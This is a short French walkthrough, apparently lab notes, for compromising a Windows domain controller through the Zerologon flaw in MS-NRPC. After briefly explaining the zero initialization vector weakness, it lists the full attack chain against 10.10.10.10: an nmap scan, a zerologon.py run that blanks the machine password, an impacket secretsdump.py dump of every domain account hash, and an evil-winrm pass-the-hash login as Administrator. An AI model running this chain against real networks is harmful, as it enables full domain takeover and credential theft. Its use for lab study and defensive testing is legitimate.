Objectif :
- utiliser la vulnérabilité Zero Logon pour outrepasser l’authentification sur la machine agissant comme controlleur de domaines
- Utiliser secretsdump.py pour obtenir les identifiants
- cracker les hashes
- avoir du plaisir
Microsoft a choisi d’utiliser l’encryption AES-CFB8 pour la fonction ComputeNetlogonCredential de MS-NRPC. Le problème est le vecteur d’initialisation utilisé qui ne contient que des “0” au lieu d’une valeur aléatoire. Quand un attaquant avant un message ne contenant que des 0, il y a une chance sur 256 pour que le texte encodé soit 0.
Normalement, le compte d’un utilisateur serait désactivé en essayant différents mots de passe, mais pas le compte d’une machine.
Pour l’exploit, il faut trouver le nom netbios du controlleur de domaines
nmap -sV -sC -oA scans/initial 10.10.10.10
maintenant, vous avez besoin de l’exploit zero logon
python3 zerologon.py the_netbios_name 10.10.10.10 #permet de mettre un mot de passe nul
secretsdump.py -just-dc -no-pass the_netbios_name\$@10.10.10.10 #de impacket #permet de lister tous les comptes. Les comptes administrateur du domaine commence souvent par a-username
evil-winrm -u Administrator -H ntlm_administrateur -i 10.10.10.10 #permet de se connecter en tant qu'administrateur sur le controlleur de domaine